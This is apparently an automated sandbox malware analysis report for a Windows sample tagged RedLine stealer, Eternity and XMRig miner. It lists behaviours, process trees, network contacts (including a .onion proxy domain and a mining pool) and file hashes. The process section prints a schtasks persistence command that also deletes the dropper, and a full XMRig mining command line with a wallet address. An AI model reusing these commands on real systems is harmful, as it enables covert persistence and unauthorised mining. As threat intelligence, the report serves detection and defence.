Malware Analysis Report

2025-06-16 03:47

Sample ID 220904-kev3nafea4
Target 9508f7888f8d8f0297c20762f4a372e704649a903b961dfe9ac4a5dc12bb5439
SHA256 9508f7888f8d8f0297c20762f4a372e704649a903b961dfe9ac4a5dc12bb5439
Tags
eternity redline xmrig installs-49 discovery infostealer miner spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

9508f7888f8d8f0297c20762f4a372e704649a903b961dfe9ac4a5dc12bb5439

Threat Level: Known bad

The file 9508f7888f8d8f0297c20762f4a372e704649a903b961dfe9ac4a5dc12bb5439 was found to be: Known bad.

Malicious Activity Summary

eternity redline xmrig installs-49 discovery infostealer miner spyware stealer

RedLine

Eternity

xmrig

XMRig Miner payload

Downloads MZ/PE file

Executes dropped EXE

Checks computer location settings

Reads user/profile data of web browsers

Checks installed software on the system

Legitimate hosting services abused for malware hosting/C2

Accesses cryptocurrency files/wallets, possible credential harvesting

Program crash

Enumerates physical storage devices

Suspicious behavior: LoadsDriver

Creates scheduled task(s)

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Runs ping.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-09-04 08:31

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-09-04 08:31

Reported

2022-09-04 08:34

Platform

win10v2004-20220812-en

Max time kernel

170s

Max time network

171s

Command Line

"C:\Users\Admin\AppData\Local\Temp\9508f7888f8d8f0297c20762f4a372e704649a903b961dfe9ac4a5dc12bb5439.exe"

Signatures

Eternity

eternity

RedLine

infostealer redline

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\9508f7888f8d8f0297c20762f4a372e704649a903b961dfe9ac4a5dc12bb5439.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Miner.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\installs49.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\installs49.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\9508f7888f8d8f0297c20762f4a372e704649a903b961dfe9ac4a5dc12bb5439.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\installs49.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Admin_TMKNGOMU.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Admin_TMKNGOMU.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2108 wrote to memory of 3876 N/A C:\Users\Admin\AppData\Local\Temp\9508f7888f8d8f0297c20762f4a372e704649a903b961dfe9ac4a5dc12bb5439.exe C:\Users\Admin\AppData\Local\Temp\Miner.exe
PID 2108 wrote to memory of 3876 N/A C:\Users\Admin\AppData\Local\Temp\9508f7888f8d8f0297c20762f4a372e704649a903b961dfe9ac4a5dc12bb5439.exe C:\Users\Admin\AppData\Local\Temp\Miner.exe
PID 2108 wrote to memory of 3876 N/A C:\Users\Admin\AppData\Local\Temp\9508f7888f8d8f0297c20762f4a372e704649a903b961dfe9ac4a5dc12bb5439.exe C:\Users\Admin\AppData\Local\Temp\Miner.exe
PID 2108 wrote to memory of 748 N/A C:\Users\Admin\AppData\Local\Temp\9508f7888f8d8f0297c20762f4a372e704649a903b961dfe9ac4a5dc12bb5439.exe C:\Users\Admin\AppData\Local\Temp\installs49.exe
PID 2108 wrote to memory of 748 N/A C:\Users\Admin\AppData\Local\Temp\9508f7888f8d8f0297c20762f4a372e704649a903b961dfe9ac4a5dc12bb5439.exe C:\Users\Admin\AppData\Local\Temp\installs49.exe
PID 2108 wrote to memory of 748 N/A C:\Users\Admin\AppData\Local\Temp\9508f7888f8d8f0297c20762f4a372e704649a903b961dfe9ac4a5dc12bb5439.exe C:\Users\Admin\AppData\Local\Temp\installs49.exe
PID 3876 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\Miner.exe C:\Windows\SysWOW64\cmd.exe
PID 3876 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\Miner.exe C:\Windows\SysWOW64\cmd.exe
PID 3876 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\Miner.exe C:\Windows\SysWOW64\cmd.exe
PID 2612 wrote to memory of 116 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2612 wrote to memory of 116 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2612 wrote to memory of 116 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2612 wrote to memory of 1132 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 2612 wrote to memory of 1132 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 2612 wrote to memory of 1132 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 2612 wrote to memory of 3636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2612 wrote to memory of 3636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2612 wrote to memory of 3636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2612 wrote to memory of 4524 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe
PID 2612 wrote to memory of 4524 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe
PID 2612 wrote to memory of 4524 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe
PID 4524 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe C:\Users\Admin\AppData\Local\Temp\Admin_TMKNGOMU.exe
PID 4524 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe C:\Users\Admin\AppData\Local\Temp\Admin_TMKNGOMU.exe

Processes

C:\Users\Admin\AppData\Local\Temp\9508f7888f8d8f0297c20762f4a372e704649a903b961dfe9ac4a5dc12bb5439.exe

"C:\Users\Admin\AppData\Local\Temp\9508f7888f8d8f0297c20762f4a372e704649a903b961dfe9ac4a5dc12bb5439.exe"

C:\Users\Admin\AppData\Local\Temp\Miner.exe

"C:\Users\Admin\AppData\Local\Temp\Miner.exe"

C:\Users\Admin\AppData\Local\Temp\installs49.exe

"C:\Users\Admin\AppData\Local\Temp\installs49.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2108 -ip 2108

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "Miner" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\Miner.exe" &&START "" "C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2108 -s 1408

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "Miner" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe

"C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe"

C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe

C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe

C:\Users\Admin\AppData\Local\Temp\Admin_TMKNGOMU.exe

"C:\Users\Admin\AppData\Local\Temp\Admin_TMKNGOMU.exe" -a cryptonight -o pool.supportxmr.com:3333 -u 45coZygmFLnRF5NY7Uz51tadci9wak52fbbhfgKR5q5BTB9QbKMiCnXiPiiwCwyUTQeF4nZD5mdAugj8yB5hTLA9ViAFFR8.Admin_TMKNGOMU -p --max-cpu-usage=40 --donate-level=1

C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe

C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe

C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe

C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe

Network

Country Destination Domain Proto
US 93.184.220.29:80 tcp
US 93.184.220.29:80 tcp
LV 94.140.112.157:29329 tcp
NL 104.80.225.205:443 tcp
US 8.8.8.8:53 rlcjba7wduej3xcstcjo577eqgjsjvcjfsw4i23fqvf2y27ylylhmhad.onion.pet udp
US 198.251.83.154:80 rlcjba7wduej3xcstcjo577eqgjsjvcjfsw4i23fqvf2y27ylylhmhad.onion.pet tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.67.143:443 pastebin.com tcp
NL 104.110.191.140:80 tcp
NL 104.110.191.140:80 tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 pool.supportxmr.com udp
FR 141.94.96.195:3333 pool.supportxmr.com tcp
FR 2.18.110.76:443 tcp

Files

memory/2108-132-0x0000000002ECC000-0x0000000002F00000-memory.dmp

memory/2108-133-0x0000000002D00000-0x0000000002D42000-memory.dmp

memory/2108-134-0x0000000000400000-0x0000000002BB6000-memory.dmp

memory/2108-135-0x0000000007450000-0x00000000079F4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Miner.exe

MD5 d1b22ce6e0f11c1b8283a85d9f902bbd
SHA1 8593038e651f856367d094b4541dd7cbffb8e7a3
SHA256 95aaf5cd2e08561391d3cc3056d8d629d7caa5ab5117bb7dbf0d7da1e3dbcdf8
SHA512 d212280985c97c6c9b4055783ae6839e42289a72a59c2863b93b1ce93edfd8ab16a5f802806f818360753e0e5f802392fbe0382eb7fae299e67bdec2205ad7ed

memory/3876-136-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\Miner.exe

MD5 d1b22ce6e0f11c1b8283a85d9f902bbd
SHA1 8593038e651f856367d094b4541dd7cbffb8e7a3
SHA256 95aaf5cd2e08561391d3cc3056d8d629d7caa5ab5117bb7dbf0d7da1e3dbcdf8
SHA512 d212280985c97c6c9b4055783ae6839e42289a72a59c2863b93b1ce93edfd8ab16a5f802806f818360753e0e5f802392fbe0382eb7fae299e67bdec2205ad7ed

memory/3876-139-0x0000000000D60000-0x0000000000D6A000-memory.dmp

memory/3876-140-0x00000000055A0000-0x0000000005606000-memory.dmp

memory/748-141-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\installs49.exe

MD5 24f5400ea175ed8a981c5f4184587ac4
SHA1 24b9e12675b4e5f389eb01d6c423e123909d02d9
SHA256 3be6f25cd0a2f0c367e34e6b2d300671626dcb7ce46aeb83f3396433d8da9bc4
SHA512 4d685f9f062359b6aae187cb88c98d55c059a316bccf6fc07aed3cbb172ee55edf84aa2fd53f67d9a5301195dddf7dc68e7e10ea2ffdf7d8a13750440f0a9669

C:\Users\Admin\AppData\Local\Temp\installs49.exe

MD5 24f5400ea175ed8a981c5f4184587ac4
SHA1 24b9e12675b4e5f389eb01d6c423e123909d02d9
SHA256 3be6f25cd0a2f0c367e34e6b2d300671626dcb7ce46aeb83f3396433d8da9bc4
SHA512 4d685f9f062359b6aae187cb88c98d55c059a316bccf6fc07aed3cbb172ee55edf84aa2fd53f67d9a5301195dddf7dc68e7e10ea2ffdf7d8a13750440f0a9669

memory/748-144-0x0000000000DF0000-0x0000000000E0C000-memory.dmp

memory/2612-145-0x0000000000000000-mapping.dmp

memory/116-146-0x0000000000000000-mapping.dmp

memory/1132-147-0x0000000000000000-mapping.dmp

memory/748-148-0x00000000067B0000-0x0000000006DC8000-memory.dmp

memory/748-149-0x0000000005690000-0x00000000056A2000-memory.dmp

memory/748-150-0x00000000057C0000-0x00000000058CA000-memory.dmp

memory/748-151-0x00000000056F0000-0x000000000572C000-memory.dmp

memory/2108-152-0x0000000002ECC000-0x0000000002F00000-memory.dmp

memory/2108-153-0x0000000000400000-0x0000000002BB6000-memory.dmp

memory/748-154-0x0000000006530000-0x00000000065C2000-memory.dmp

memory/748-155-0x0000000007A80000-0x0000000007AD0000-memory.dmp

memory/3636-157-0x0000000000000000-mapping.dmp

memory/748-156-0x0000000007AD0000-0x0000000007B46000-memory.dmp

memory/4524-158-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe

MD5 d1b22ce6e0f11c1b8283a85d9f902bbd
SHA1 8593038e651f856367d094b4541dd7cbffb8e7a3
SHA256 95aaf5cd2e08561391d3cc3056d8d629d7caa5ab5117bb7dbf0d7da1e3dbcdf8
SHA512 d212280985c97c6c9b4055783ae6839e42289a72a59c2863b93b1ce93edfd8ab16a5f802806f818360753e0e5f802392fbe0382eb7fae299e67bdec2205ad7ed

C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe

MD5 d1b22ce6e0f11c1b8283a85d9f902bbd
SHA1 8593038e651f856367d094b4541dd7cbffb8e7a3
SHA256 95aaf5cd2e08561391d3cc3056d8d629d7caa5ab5117bb7dbf0d7da1e3dbcdf8
SHA512 d212280985c97c6c9b4055783ae6839e42289a72a59c2863b93b1ce93edfd8ab16a5f802806f818360753e0e5f802392fbe0382eb7fae299e67bdec2205ad7ed

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Miner.exe.log

MD5 81ab0e59097e03cb04c32378024d6628
SHA1 cc2a7a335f905e787906b6a0820acfbd4c5d0ed2
SHA256 704dd8b8fb6dfccf43fd0712e36950102151fe7232d6602c53a42af967969533
SHA512 3dd1374962c4d913ad6ec4207889abcca3e28946fa8937626bd2d13025a538e676bfc2efe76d27031d3f741bb3934104c0cf4e10da62758839add1fe543dfacb

memory/748-162-0x0000000006770000-0x000000000678E000-memory.dmp

memory/748-163-0x0000000007280000-0x0000000007442000-memory.dmp

C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe

MD5 d1b22ce6e0f11c1b8283a85d9f902bbd
SHA1 8593038e651f856367d094b4541dd7cbffb8e7a3
SHA256 95aaf5cd2e08561391d3cc3056d8d629d7caa5ab5117bb7dbf0d7da1e3dbcdf8
SHA512 d212280985c97c6c9b4055783ae6839e42289a72a59c2863b93b1ce93edfd8ab16a5f802806f818360753e0e5f802392fbe0382eb7fae299e67bdec2205ad7ed

memory/748-165-0x00000000090F0000-0x000000000961C000-memory.dmp

memory/4072-166-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\Admin_TMKNGOMU.exe

MD5 84cbc72865b542c646bd89bb9430e7d1
SHA1 c8320b1e24f22b36c1a283506dacdcbcf5598a4f
SHA256 323a18d661fab8c743bb0584b4182902f49640a9ead4b9cedfb548889c25a9d4
SHA512 235afdba7fcf029920a20ac3d99ce0dacd87554d27a0e473ff5636c74f7f747ed9d242637d10963bac7461f789266191b37beaec0b9acdd2dc38b0f196ae65a8

C:\Users\Admin\AppData\Local\Temp\Admin_TMKNGOMU.exe

MD5 84cbc72865b542c646bd89bb9430e7d1
SHA1 c8320b1e24f22b36c1a283506dacdcbcf5598a4f
SHA256 323a18d661fab8c743bb0584b4182902f49640a9ead4b9cedfb548889c25a9d4
SHA512 235afdba7fcf029920a20ac3d99ce0dacd87554d27a0e473ff5636c74f7f747ed9d242637d10963bac7461f789266191b37beaec0b9acdd2dc38b0f196ae65a8

memory/4072-169-0x000001C6B2850000-0x000001C6B2870000-memory.dmp

memory/4072-170-0x000001C6B2880000-0x000001C6B28C0000-memory.dmp

C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe

MD5 d1b22ce6e0f11c1b8283a85d9f902bbd
SHA1 8593038e651f856367d094b4541dd7cbffb8e7a3
SHA256 95aaf5cd2e08561391d3cc3056d8d629d7caa5ab5117bb7dbf0d7da1e3dbcdf8
SHA512 d212280985c97c6c9b4055783ae6839e42289a72a59c2863b93b1ce93edfd8ab16a5f802806f818360753e0e5f802392fbe0382eb7fae299e67bdec2205ad7ed

memory/4072-172-0x000001C6B28C0000-0x000001C6B28E0000-memory.dmp

memory/4072-173-0x000001C6B28E0000-0x000001C6B2900000-memory.dmp

memory/4072-174-0x000001C6B28C0000-0x000001C6B28E0000-memory.dmp

memory/4072-175-0x000001C6B28E0000-0x000001C6B2900000-memory.dmp

C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe

MD5 d1b22ce6e0f11c1b8283a85d9f902bbd
SHA1 8593038e651f856367d094b4541dd7cbffb8e7a3
SHA256 95aaf5cd2e08561391d3cc3056d8d629d7caa5ab5117bb7dbf0d7da1e3dbcdf8
SHA512 d212280985c97c6c9b4055783ae6839e42289a72a59c2863b93b1ce93edfd8ab16a5f802806f818360753e0e5f802392fbe0382eb7fae299e67bdec2205ad7ed